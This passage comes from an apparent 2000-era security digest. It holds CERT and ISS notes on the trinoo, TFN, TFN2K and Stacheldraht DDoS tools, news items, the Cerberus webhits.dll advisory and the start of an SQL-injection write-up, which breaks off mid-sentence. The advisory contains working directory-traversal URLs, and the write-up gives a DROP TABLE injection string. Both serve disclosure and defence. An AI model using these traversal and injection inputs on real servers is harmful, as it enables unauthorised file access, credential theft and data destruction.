27665/tcp require a password, which is stored in the daemon binary in encrypted form. All communications with the daemon on port 27444/udp require the UDP packet to contain the string "l44" (that's a lowercase L, not a one). The source IP addresses of the packets in a trinoo-generated UDP flood attack are not spoofed in versions of the tool we have seen. Future versions of the tool could implement IP source address spoofing. Regardless, a trinoo-generated denial of service attack will most likely appear to come from a large number of different source addresses. We have seen trinoo daemons installed under a variety of different names, but most commonly as ns http rpc.trinoo rpc.listen trinix rpc.irix irix Running strings against the daemon and master binaries produces output similar to this (we have replaced master IP address references in the daemon binary with X.X.X.X) trinoo daemon trinoo master socket ---v bind v1.07d2+f3+c recvfrom trinoo %s %s %s %s l44adsl aIf3YWfOhw.V. sock PONG 0nm1VNMXqRMyM *HELLO* 15:08:41 X.X.X.X Aug 16 1999 X.X.X.X trinoo %s [%s:%s] X.X.X.X bind read *HELLO* ... rest omitted ... Tribe Flood Network TFN, much like Trinoo, is a distributed tool used to launch coordinated denial of service attacks from many sources against one or more targets. In additional to being able to generate UDP flood attacks, a TFN network can also generate TCP SYN flood, ICMP echo request flood, and ICMP directed broadcast (e.g., smurf) denial of service attacks. TFN has the capability to generate packets with spoofed source IP addresses. Please see the following CERT Advisories for more information about these types of denial of service attacks. CA-96.01, TCP SYN Flooding and IP Spoofing Attacks CA-98.01, "smurf" IP Denial of Service Attacks A denial of service attack utilizing a TFN network is carried out by an intruder instructing a client, or master, program to send attack instructions to a list of TFN servers, or daemons. The daemons then generate the specified type of denial of service attack against one or more target IP addresses. Source IP addresses and source ports can be randomized, and packet sizes can be altered. A TFN master is executed from the command line to send commands to TFN daemons. The master communicates with the daemons using ICMP echo reply packets with 16 bit binary values embedded in the ID field, and any arguments embedded in the data portion of packet. The binary values, which are definable at compile time, represent the various instructions sent between TFN masters and daemons. Use of the TFN master requires an intruder-supplied list of IP addresses for the daemons. Some reports indicate recent versions of TFN master may use blowfish encryption to conceal the list of daemon IP addresses. Reports also indicate that TFN may have remote file copy (e.g., rcp) functionality, perhaps for use for automated deployment of new TFN daemons and/or software version updating in existing TFN networks. We have seen TFN daemons installed on systems using the filename td. Running strings on the TFN daemon binary produces output similar to this. %d.%d.%d.%d ICMP Error sending syn packet. tc: unknown host 3.3.3.3 mservers randomsucks skillz rm -rf %s ttymon rcp %s@%s:sol.bin %s nohup ./%s X.X.X.X X.X.X.X lpsched sicken in.telne Solutions Distributed attack tools leverage bandwidth from multiple systems on diverse networks to produce very potent denial of service attacks. To a victim, an attack may appear to come from many different source addresses, whether or not IP source address spoofing is employed by the attacker. Responding to a distributed attack requires a high degree of communication between Internet sites. Prevention is not straight forward because of the interdependency of site security on the Internet; the tools are typically installed on compromised systems that are outside of the administrative control of eventual denial of service attack targets. There are some basic suggestions we can make regarding distributed denial of service attacks: Prevent installation of distributed attack tools on your systems Remain current with security-related patches to operating systems and applications software. Follow security best-practices when administrating networks and systems. Prevent origination of IP packets with spoofed source addresses For a discussion of network ingress filtering, refer to RFC 2267, Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing Monitor your network for signatures of distributed attack tools Sites using intrusion detection systems (e.g., IDS) may wish to establish patterns to look for that might indicate trinoo or TFN activity based on the communications between master and daemon portions of the tools. Sites who use pro-active network scanning may wish to include tests for installed daemons and/or masters when scanning systems on your network. if you find a distributed attack tool on your systems It is important to determine the role of the tools installed on your system. The piece you find may provide information that is useful in locating and disabling other parts of distributed attack networks. We encourage you to identify and contact other sites involved. If you are involved in a denial of service attack Due to the potential magnitude of denial of service attacks generated by distributed networks of tools, the target of an attack may be unable to rely on Internet connectivity for communications during an attack. Be sure your security policy includes emergency out-of-band communications procedures with upstream network operators or emergency response teams in the event of a debilitating attack. In November 1999, experts addressed issues surrounding distributed-systems intruder tools. The DSIT Workshop produced a paper where workshop participants examine the use of distributed-system intruder tools and provide information about protecting systems from attack by the tools, detecting the use of the tools, and responding to attacks. Results of the Distributed-Systems Intruder Tools Workshop Acknowledgments The CERT/CC would like to acknowledge and thank our constituency and our peers for important contributions to the information used in this Incident Note. This document is available from: http://www.cert.org/incident_notes/IN-99-07.html Articles of interest: Characterizing and Tracing Packet Floods Using Cisco Routers http://www.cisco.com/warp/public/707/22.html Improving Security on Cisco Routers http://www.cisco.com/warp/public/707/21.html Internet Security Advisories: http://www.cisco.com/warp/public/707/advisory.html Additional info, ISS advisory on Trinoo/Tribe variants: -----BEGIN PGP SIGNED MESSAGE----- ISS Security Alert February 9, 2000 Denial of Service Attack using the TFN2K and Stacheldraht programs Synopsis: A new form of Distributed Denial of Service (DDoS) attack has been discovered following the release of the trin00 and Tribe Flood Network (TFN) denial of service programs (see December 7, 1999 ISS Security Alert at http://xforce.iss.net/alerts/advise40.php3). These attacks are more powerful than any previous denial of service attack observed on the Internet. A Distributed Denial of Service attack is designed to bring a network down by flooding target machines with large amounts of traffic. This traffic can originate from many compromised machines, and can be managed remotely using a client program. ISS X-Force considers this attack a high risk since it can potentially impact a large number of organizations. DDoS attacks have proven to be successful and are difficult to defend against. Description: Over the last two months, several high-capacity commercial and educational networks have been affected by DDoS attacks. In addition to the trin00 and TFN attacks, two additional tools are currently being used to implement this attack: TFN2K and Stacheldraht. Both of these tools are based on the original TFN/trin00 attacks described in the December ISS Security Alert. Attackers can install one of these DDoS programs (trin00, TFN, TFN2K, or Stacheldraht) on hundreds of compromised machines and direct this network of machines to initiate an attack against single or multiple victims. This attack occurs simultaneously from these machines, making it more dangerous than any DoS attack launched from a single machine. Technical Information: TFN2K: The TFN2K distributed denial of service system consists of a client/server architecture. The Client: The client is used to connect to master servers, which can then perform specified attacks against one or more victim machines. Commands are sent from the client to the master server within the data fields of ICMP, UDP, and TCP packets. The data fields are encrypted using the CAST algorithm and base64 encoded. The client can specify the use of random TCP/UDP port numbers and source IP addresses. The system can also send out "decoy" packets to non-target machines. These factors make TFN2K more difficult to detect than the original TFN program. The Master Server: The master server parses all UDP, TCP, and ICMP echo reply packets for encrypted commands. The master server does not use a default password when it is selected by the user at compile time. The Attack: The TFN2K client can be used to send various commands to the master for execution, including commands to flood a target machine or set of target machines within a specified address range. The client can send commands using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth. Possible methods for detection of these flooding attacks are recommended in the TFN/trin00 December 7, 1999 ISS Security Alert. TFN2K can also be used to execute remote commands on the master server and bind shells to a specified TCP port. TFN2K runs on Linux, Solaris, and Windows platforms. Stacheldraht (Barbed Wire): Stacheldraht consists of three parts: the master server, client, and agent programs. The Client: The client is used to connect to the master server on port 16660 or port 60001. Packet contents are blowfish encrypted using the default password "sicken", which can be changed by editing the Stacheldraht source code. After entering the password, an attacker can use the client to manage Stacheldraht agents, IP addresses of attack victims, lists of master servers, and to perform DoS attacks against specified machines. The Master Server: The master server handles all communication between client and agent programs. It listens for connections from the client on port 16660 or 60001. When a client connects to the master, the master waits for the password before returning information about agent programs to the client and processing commands from the client. The Agent: The agent listens for commands from master servers on port 65000. In addition to this port, master server/agent communications are also managed using ICMP echo reply packets. These packets are transmitted and replied to periodically. They contain specific values in the ID field (such as 666, 667, 668, and 669) and corresponding plaintext strings in the data fields (including "skillz", "ficken", and "spoofworks"). The ICMP packets act as a "heartbeat" between agent and master server, and to determine source IP spoofing capabilities of the master server. The agent identifies master servers using an internal address list, and an external encrypted file containing master server IP addresses. Agents can be directed to "upgrade" themselves by downloading a fresh copy of the agent program and deleting the old image as well as accepting commands to execute flood attacks against target machines. The Attack: Like TFN/TFN2K, Stacheldraht can be used to perform ICMP, SYN, and UDP flood attacks. The attacks can run for a specified duration, and SYN floods can be directed to a set of specified ports. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth. Possible methods for detection of these flooding attacks are discussed in the TFN/trin00 ISS Security Alert published December 7, 1999. Stacheldraht runs on Linux and Solaris machines. Detecting TFN2K/Stacheldraht related attacks: ISS SAFEsuite intrusion detection solution, RealSecure, detects the Denial of Service attacks that these distributed tools use, providing early warning and response capabilities. RealSecure can reconfigure firewalls and routers to block the traffic. On some firewalls this can be as granular as blocking a particular service or protocol port. In conjunction with the December 7, 1999 ISS Security Alert, RealSecure 3.2.1 included signatures to detect the communications between the distributed components of TFN and trin00. RealSecure will add signatures to detect TFN2K and Stacheldraht in its next release, which will also include an X-press Update capability to speed future signature deployment. Additional Information: ISS worked in coordination with CERT, SANS, and the NIPC. The following is additional information regarding these DDoS attacks: - - Advisory CA-2000-01 Denial-of-Service Developments http://www.cert.org/advisories/CA-2000-01.html - - SANS Network Security Digest Vol. 4 No. 1 - January 17, 2000 - - http://www.fbi.gov/nipc/trinoo.htm - - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis About ISS ISS is a leading global provider of security management solutions for e-business. By offering best-of-breed SAFEsuite(tm) security software, comprehensive ePatrol(tm) monitoring services, and industry-leading expertise, ISS serves as its customers' trusted security provider protecting digital assets and ensuring the availability, confidentiality and integrity of computer systems and information critical to e-business success. ISS' security management solutions protect more than 5,000 customers including 21 of the 25 largest U.S. commercial banks, 9 of the 10 largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe and Latin America. For more information, visit the ISS Web site at www.iss.net or call 888-901-7477. Copyright (c) 2000 by Internet Security Systems, Inc. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well as on MIT's PGP key server and PGP.com's key server. Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBOKHygjRfJiV99eG9AQGLhQP+L2H4KNHtP2Tl9YT3P5OIkbSrIszC8lW/ iDM8+6wkz0POcjNDXNHNDpVb203Yv+tjdBu/q6cP7QYVeZ9PUElUfXcN6a4bJTpH OOaARlvyPRFiArxvFgdIbypsFhTWxc4blJOMb8rbBZgzEa7pZiBzZQibN54l3E1A vg77CCVq3W8= =sMAK -----END PGP SIGNATURE----- @HWA 09.0 Teen charged with hacking ~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm Student charged with hacking Fugitive: Prosecutors say he broke into Palo Alto firm, then fled to Bulgaria. BY HOWARD MINTZ Mercury News Staff Writer A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers. In the government's latest attempt to hunt down a computer hacker, federal prosecutors brought charges against Peter Iliev Pentchev, a 22-year-old native of Bulgaria who is believed to have fled the United States after school officials confronted him about his computer activities. According to the U.S. Attorney's office in San Jose, Pentchev left the country in late 1998, shortly after the alleged hacking incident occurred. Law enforcement officials believe Pentchev went to Bulgaria and were unclear Wednesday what diplomatic obstacles there may be to returning him to this country to face charges. The four-count indictment charges Pentchev with violating federal computer laws by hacking into an undisclosed Palo Alto company between Nov. 20 and Dec. 19, 1998, stealing at least 1,800 credit card numbers, as well as user names and passwords of that company's customers. The indictment does not specify the company, and federal officials declined to name it. But Assistant U.S. Attorney Mavis Lee, who is prosecuting the case, said the hacking incident shut down one of the company's Web servers for five days and caused enough chaos in its database that it cost the firm more than $100,000 to restore its security system. Authorities have no evidence that Pentchev used the credit card numbers to commit fraud. Federal law-enforcement officials do not believe there is a link between Pentchev and a computer intruder who earlier this month attempted to extort $100,000 from Internet music retailer CD Universe, claiming to have stolen as many as 300,000 credit card numbers. The alleged extortionist was suspected of operating somewhere in Eastern Europe. That hacker began posting more than 25,000 allegedly stolen card numbers on a web site Christmas Day. The site eventually was shut down, and thousands of customers who had shopped at CD Universe canceled their cards. In the Bay Area case, investigators said they were able to trace the computer intrusion to Pentchev because he left evidence in log files in the company's computer system. ``He wasn't careful about mopping up after himself,'' Lee said. Princeton University officials confronted Pentchev about the allegations in December 1998, and he disappeared shortly thereafter. If convicted, Pentchev faces a maximum penalty of 17 years in prison. Contact Howard Mintz at hmintz@sjmercury.com or (408) 286-0236. @HWA 10.0 Major security flaw found on Microsoft product ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exclusive: Major security flaw hits Microsoft http://www.zdnet.co.uk/news/2000/3/ns-12942.html Thu, 27 Jan 2000 17:03:47 GMT Will Knight More embarrassment for Microsoft security as yet another flaw is discovered. Will Knight brings you this exclusive report A British security expert claims to have uncovered a major security flaw in Microsoft's Web server software, Internet Information Server 4 (IIS). David Litchfield a Windows NT specialist with British firm Cerberus Information Security, says the latest exploit against a Microsoft product allows a malicious hacker to gain unauthorised access to sensitive files, including cached or stored credit card details, address information, user IDs and passwords. Of most concern is the way these details can be seized: typing a simple URL into any browser makes it possible to gain access to files on Web servers running IIS, that have not been specifically configured to disable the exploit. According to Litchfield, the situation is serious. "It takes no expertise [to use this technique] at all. It's so easy to exploit, I dare not give out a specific example. It would just fall into the hands of script kiddies [a copycat who uses someone else's techniques to hack a system]." ZDNet UK News has a copy of the exploit technique. Thousands of e-commerce Web sites use IIS prompting Litchfield to warn a number of high profile UK e-commerce sites he believed were vulnerable. Last year Microsoft suffered a major PR blow when its Hotmail service -- the world's leading Web based email service -- was left open to attack by a similarly simple hacking technique. But it is not just Microsoft's products that are vulnerable to attack: there have been several security breaches of high-profile e-commerce Web sites illustrating the precarious nature of the fledgling technology. Visa, for example, recently confirmed receiving ransom demands from individuals claiming to be able to bring down their computer system. E-commerce Web site CDUniverse was also struck by a computer hacker who stole hundreds of credit card numbers and published them on the Internet. Mark Tennant, Microsoft product manager for NT Server told ZDNet UK News, Thursday that although Microsoft products had made headlines recently for its security flaws, it was to be expected. "This product is a mainstream product with millions of users, obviously with that many users flaws are more likely to be picked up." Ostensibly that might be true, but to observers, those who see Microsoft products hacked time and again, isn't it a worrying pattern? Tennant disagrees and drew comparisons with Linux "which doesn't have millions of users so you therefore don't hear of this type of issue". He added: "Microsoft is completely committed to security." Asked if that commitment could guarantee Windows 2000 -- NT's big brother due next month -- would not suffer the same sort of security flaws as its predecessor Tennant said: "I cannot predict what could happen a month down a line... but we are committed to security." Litchfield suggests the pressure put on organisations to get online, by both government and software houses has led to companies leaving themselves wide open to computer criminals. "The World Wide Web is a hacker's paradise," he remarks. "The lure of e-commerce as an effective channel to further promote a business and fuel its success has led to too many companies getting 'connected' too quickly, sacrificing security for speed." Security consultant Neil Barrett from another security firm, UK Information Risk Management, agrees: "The Holy Grail to any hacker is the remote access exploit. In the past problems with IIS have mainly been denial of service. If this exploit does what it says it does, it's down to how well credit card details are protected on a system which we know from experience is not very well at all." As a first defence Barrett advises either an intrusion detection system or encryption or ideally "both". Full details of the exploit are available from the Cerberus Web site at this address:http://www.cerberus-infosec.co.uk/adviishtw.html and a patch for Internet Information Server 4 may be downloaded from the Microsoft security home page. What do you think? Tell the Mailroom. And read what others have said. @HWA 11.0 Cerberus Information Security Advisory (CISADV000126) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: win2k security list Date: Jan 26th Cerberus Information Security Advisory (CISADV000126) http://www.cerberus-infosec.co.uk/advisories.html Released : 26th January 2000 Name : Webhits.dll buffer truncation Affected Systems: Microsoft Windows NT 4 running Internet Information Server 4 All service Packs Issue : Attackers can access files outside of the web virtual directory system and view ASP source Author : David Litchfield (mnemonix@globalnet.co.uk) Microsoft Advisory : http://www.microsoft.com/technet/security/bulletin/ms00-006.asp Internet Information Server 4.0 ships with an ISAPI application webhits.dll that provides hit-highlighting functionality for Index Server. Files that have the extention .htw are dispatched by webhits.dll. A vulnerability exists in webhits however that allows an attacker to break out of the web virtual root file system and gain unathorized access to other files on the same logical disk drive, such as customer databases, log files or any file they know or can ascertain the path to. The same vulnerability can be used to obtain the source of Active Server Pages or any other server side script file which often contain UserIDs and passwords as well as other sensitive information. *** WARNING **** Even if you have no .htw files on your system you're probably still vulnerable! A quick test to show if you are vulnerable: go to http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw If you receive a message stating the "format of the QUERY_STRING is invalid" you _are_ vulnerable. Cerberus Information Security's free vulnerability scanner - CIS - now contains a check for this issue - available from the website http://www.cerberus-infosec.co.uk/ *** WARNING **** Details ******* This vulnerability exploits two problems and for the sake of clarity this section will be spilt into two. 1) If you DO have .htw files on your system **************************************** The hit-highlighting functionality provided by Index Server allows a web user to have a document returned with their original search terms highlighted on the page. The name of the document is passed to the .htw file with the CiWebHitsFile argument. webhits.dll, the ISAPI application that deals with the request, opens the file highlights accordingly and returns the resulting page. Because the user has control of the CiWebHitsFile argument passed to the .htw file they can request pretty much anything they want. A secondary problem to this is the source of ASP and other scripted pages can be revealed too. However, webhits.dll will follow double dots and so an attacker is able to gain access to files outside of the web virtual root. For example to view the web access logs for a given day the attacker would build the following URL http://charon/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../win nt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Ful l Sample .htw files often installed and left on the system are /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /iishelp/iis/misc/iirturnh.htw (this .htw is normally restricted to loopback) 2) If you DON'T have any .htw files on your system ************************************************** To invoke the webhits.dll ISAPI application a request needs to be made to a .htw file but if you don't have any on your web server you might wonder why you are still vulnerable - requesting a non-existent .htw file will fail. The trick is to be able to get inetinfo.exe to invoke webhits.dll but then also get webhits.dll to access an existing file. We achevie this by crafting a special URL. First we need a valid resource. This must be a static file such as a .htm, .html, .txt or even a .gif or a .jpg. This will be the file opened by webhits.dll as the template file. Now we need to get inetinfo.exe to pass it along to webhits for dispatch and the only way we can do this is by requesting a .htw file. http://charon/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w 3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full will fail. Obviously. There is no such file on the system with that name. Notice we've now invoked webhits, however, and by placing a specific number of spaces (%20s) between the exisiting resource and the .htw it is then possible to trick the web service: The buffer that holds the name of the .htw file to open is truncated, causing the .htw part to be removed and therefore when it comes to webhits.dll attempting to open the file it succeeds and we are then returned the contents of the file we want to access without there actually being a real .htw file on the system. The code is probably doing something similar to this: FILE *fd; int DoesTemplateExist(char *pathtohtwfile) { // Just in case inetinfo.exe passes too long a string // let's make sure it's of a suitable length and not // going to open a buffer overrun vulnerability char *file; file = (char *)malloc(250); strncpy(file,pathtohtwfile,250); fd = fopen(file,"r"); // Success if(fd !=NULL) { return 1; } // failed else { return 0; } } Here webhits.dll "contains" a function called DoesTemplateExist() and is passed a pointer to a 260 byte long string buffer containing the path to the .htw file to open but this buffer is further reduced in length by the strncpy() function removing whatever was stored in the last ten bytes (in this case the .htw of the HTTP REQUEST_URI) so when fopen() is called it succeeds. This happens because Windows NT will ignore trailing spaces in a file name. Solution ******** .htw needs to be unassociated from webhits.dll To do this open the Internet Server Manager (MMC). In the left hand pane right click the computer you wish to administer and from the menu that pops up choose Properties. From the Master Properties select the WWW Service and then click Edit. The WWW Service Master properties window should open. From here click on the Home Directory tab and then click the Configuration button. You should be presented with an App Mappings tab in the Application Mappings window. Find the .htw extention and then highlight it then click on remove. If a confirmation window pops up selected Yes to remove. Finally click on Apply and select all of the child nodes this should apply to and then OK that. Now close all of the WWW Service property windows. About Cerberus Information Security, Ltd **************************************** Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilites leading to the dicovery "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services. Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405 Permission is hereby granted to copy or redistribute this advisory but only in its entirety. Copyright (C) 2000 by Cerberus Information Security, Ltd _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 12.0 "How I hacked Packetstorm Security" by Rainforest Puppy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -- Advisory RFP2K01 ------------------------------ rfp.labs ------------ "How I hacked PacketStorm" A look at hacking wwwthreads via SQL ------------------------------- rain forest puppy / rfp@wiretrip.net --- Table of contents: -1. Scope of problem -2. Long explaination of SQL hacking -3. Solution -4. Conclusion -5. Included perl scripts ------------------------------------------------------------------------ ----[ 1. Scope of problem Many applications are vulnerable to various forms of SQL hacking. While programs know they should avoid strcpy() and giving user data to a system() call, many are unaware of how SQL queries can be tampered with. This is more of a technical paper than an advisory, but it does explain how I used a vulnerability in the wwwthreads package to gain administrative access and some 800 passwords to PacketStorm's discussion forum. ----[ 2. Long explaination of SQL hacking As with any other day, I was surfing around the PacketStorm forums, which use wwwthreads. The URL parameters (the cruft after the '?' in an URL) of the forums started catching my eye. Being the web security puppy I am, I started getting curious. So using an ultra-insightful hacking technique, I changed the 'Board=general' parameter to read 'Board=rfp' used with the showpost.pl script. Lo and behold I get the following error given to me: We cannot complete your request. The reason reported was: Can't execute query: SELECT B_Main,B_Last_Post FROM rfp WHERE B_Number=1 . Reason: Table 'WWWThreads.rfp' doesn't exist Seeing there's also a 'Number=1' parameter, we can figure this query can be reconstructed as SELECT B_Main,B_Last_Post FROM $Board WHERE B_Number=$Number Now, if any of you have read my phrack 54 article (the SQL appension part, available at http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=2) you can see where I'm going. We can not only substitute a $Board name and $Number, but also extra SQL commands. Imagine if $Board were to equal 'general; DROP TABLE general; SELECT * FROM general ' This would translate into SELECT B_Main,B_Last_Post FROM general; DROP TABLE general; SELECT * FROM general WHERE B_Number=$Number Now the ';' is generic for ending a command. Normally we could use a '#' for mySQL to ignore everything else on the line; however, the 'FROM' clause is on a separate line than the 'WHERE' clause, so mySQL won't ignore it. Considering that invalid SQL will cause mySQL to not run any commands, we at least need to give a valid command string to parse...in this case, we feed a generic select (similiar to the original) back to it. The result of this (theoretically) is to drop (delete) the general forum table. But in reality, it doesn't work. Not because the theory is wrong, but because the database user we're using doesn't have DROP privileges. And due to how wwwthreads is written, it won't quite let you do much with this. But all is not lost, we can just start changing all numbers left and right, looking for where it blows up...or we can go the easy route and download the (eval) source code from www.wwwthreads.com. Yeah, kind of cheating, but it's not quite a one-to-one solution. You see, the eval code and the license code (of which PacketStorm is running) are slightly different, including their SELECT statements. So we have to be a little creative. First, let's find the SELECT statement (or equivalent) that's featured above. I like to use less, so I just 'less showpost.pl', and search (the '/' key) for 'SELECT'. We come up with # Grab the main post number for this thread $query = qq! SELECT Main,Last_Post FROM $Board WHERE Number=$Number !; Wow, that's it..except the field names (Main,Last_Post,Number) are different than the pro version (B_Main,B_Last_Post,B_Number). If we look right above it, we see # Once and a while it people try to just put a number into the url, if (!$Number) { w3t::not_right("There was a problem looking up the Post... Which is what limits the use of the $Number parameter. At this point let's now evaluate 'why' we want to go forth into this. Obviously DROP'ing tables ranks right up there with other stupid DoS tricks. You may be able to modify other people's posts, but that's lame too. Perhaps setting up our own forum? All that information is stored in the DB. But that's a lot of records to update. How about becoming a moderator? Or even better, an administrator? Administrators can add, delete, and modify forums, boards, and users. That may be a worthy goal, although your still only limited to the realm of the forum, which makes you a king of a very small and pitiful domain. However, there is one thing worthy. If you make yourself a user account, you'll notice you have to enter a password. Hmmm...those passwords are stored someplace...like, in the database. If we hedge our 'password reuse' theory, and combined with the fact that wwwthreads (in some configurations) post the IP address of the poster, we have some possibilities worth checking out. So, let's look at this password thing. Going into 'edit profile' gives us a password field, which looks an awful lot like a crypt hash (view the HTML source). Damn, so the passwords are hashed. Well, that just means you'll need a password cracker and more time before you can start checking on password reuse. Assuming we *can* get the passwords...... Let's start with the administrator access first. The adduser.pl script is a good place to start, since it should show us all parameters of a user. Notice the following code # -------------------------------------- # Check to see if this is the first user $query = qq! SELECT Username FROM Users !; $sth = $dbh -> prepare ($query) or die "Query syntax error: $DBI::errstr. Query: $query"; $sth -> execute() or die "Can't execute query: $query. Reason: $DBI::errstr"; my $Status = ""; my $Security = $config{'user_security'}; my $rows = $sth -> rows; $sth -> finish; # ------------------------------------------------------- # If this is the first user, then status is Administrator # otherwise they are just get normal user status. if (!$rows){ $Status = "Administrator"; $Security = 100; } else { $Status = "User"; } What this does is look to see if any users are defined. If no users are defined, the first user added gets the Status of 'Administrator' and a security level of 100. After that, all added users just get Status=User. So we need to find a way to make our Status=Administrator. A full user record can be seen a little further down... # ------------------------------ # Put the user into the database my $Status_q = $dbh -> quote($Status); $Username_q = $dbh -> quote($Username); my $Email_q = $dbh -> quote($Email); my $Display_q = $dbh -> quote($config{'postlist'}); my $View_q = $dbh -> quote($config{'threaded'}); my $EReplies_q = $dbh -> quote("Off"); $query = qq! INSERT INTO Users (Username,Email,Totalposts,Laston,Status,Sort, Display,View,PostsPer,EReplies,Security,Registered) VALUES ($Username_q,$Email_q,0,$date,$Status_q,$config{'sort'}, $Display_q,$View_q,$config{'postsperpage'},$EReplies_q,$Security,$date) !; Now, I should take a moment here and explain the quote() function. A string value of "blah blah blah", when stuck into a query that looks like "SELECT * FROM table WHERE data=$data" will wind up looking like SELECT * FROM table WHERE data=blah blah blah which is not valid. The database doesn't know what to do with the extra two blah's, since they look like commands. Therefore all string data need to be encapsulated in single quotes ('). Therefore the query should look like SELECT * FROM table WHERE data='blah blah blah' which is correct. Now, in my SQL appension article I talk about 'breaking out' of the single quote string by including your own single quote. So if we submitted "blah blah' MORE SQL COMMANDS...", it would look like SELECT * FROM table WHERE data='blah blah' MORE SQL COMMANDS...' ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ data we submitted This causes the SQL engine to interpret the MORE SQL COMMANDS as actual SQL commands, since if figured the 'data' part of the string ended with the second single quote (the one we submitted). This is a drawback of converting data into a 'human readable' string, to be parsed back into data again...it's hard to determine what's 'code/commands' and what's 'data'. All is not lost, however. By submitting a '', it tells the SQL engine to NOT end the data string, but rather only think of it as a single quote in the data context. Therefore the following query SELECT * FROM table WHERE data='data''more data' makes the database look for the value "data'more data". So to keep people from breaking out of strings and submitting extra SQL commands, all you have to do is double up every single quote (turn ' into ''). This will ensure that all data is indeed considered data. And this is what the DBI->quote() function does--it will put single quotes around the string, and double all single quotes in the string. So after all of that explaination, the short of it is that anything that is run through quote() is of no use to use, because we can't submit extra SQL commands or otherwise tamper with anything fun. And if you look, wwwthreads uses quote() extensively. So this may be rough. But all is not lost... You see, there are different field types. You can have strings, boolean values, various numeric values, etc. While a string field needs to be in the format of field='data', a numeric field doesn't use the '' (i.e. numeric_field='2' is invalid). The correct syntax for numeric fields in numeric_field=2. Ah ha! There's no quotes to deal with, and you can't even use quotes anyways. The correct solution is to make sure all numeric field data is indeed numeric (more on this later). But I'll give you a hint...wwwthreads doesn't go that far (nor do most applications, actually). So, now we need a SQL statement that preferably deals with a table we are interested in. A SELECT statement (retrieves data) is tougher, since we'll need to include a whole 'nother query to do something other than SELECT. INSERT and UPDATE are nice because we're already modifying data...we can just ride in more data to update (hopefully). Poking around brings us to a very nice spot...changeprofile.pl. This is the script that takes data entered in editprofile.pl and enters the changes into the database. Of course, the profile is our user profile. This means to use this, we need a valid user account. In any event, let's have a look-see... # Format the query words my $Password_q = $dbh -> quote($Password); my $Email_q = $dbh -> quote($Email); my $Fakeemail_q = $dbh -> quote($Fakeemail); my $Name_q = $dbh -> quote($Name); my $Signature_q = $dbh -> quote($Signature); my $Homepage_q = $dbh -> quote($Homepage); my $Occupation_q = $dbh -> quote($Occupation); my $Hobbies_q = $dbh -> quote($Hobbies); my $Location_q = $dbh -> quote($Location); my $Bio_q = $dbh -> quote($Bio); my $Username_q = $dbh -> quote($Username); my $Display_q = $dbh -> quote($Display); my $View_q = $dbh -> quote($View); my $EReplies_q = $dbh -> quote($EReplies); my $Notify_q = $dbh -> quote($Notify); my $FontSize_q = $dbh -> quote($FontSize); my $FontFace_q = $dbh -> quote($FontFace); my $ICQ_q = $dbh -> quote($ICQ); my $Post_Format_q= $dbh -> quote($Post_Format); my $Preview_q = $dbh -> quote($Preview); Ack! Practically everything is quoted! That means all those parameters are useless to us. And lets peek at the final actual query that sticks all our information back into the database # Update the User's profile my $query =qq! UPDATE Users SET Password = $Password_q, Email = $Email_q, Fakeemail = $Fakeemail_q, Name = $Name_q, Signature = $Signature_q, Homepage = $Homepage_q, Occupation = $Occupation_q, Hobbies = $Hobbies_q, Location = $Location_q, Bio = $Bio_q, Sort = $Sort, Display = $Display_q, View = $View_q, PostsPer = $PostsPer, EReplies = $EReplies_q, Notify = $Notify_q, TextCols = $TextCols, TextRows = $TextRows, FontSize = $FontSize_q, FontFace = $FontFace_q, Extra1 = $ICQ_q, Post_Format = $Post_Format_q, Preview = $Preview_q WHERE Username = $Username_q !; Since 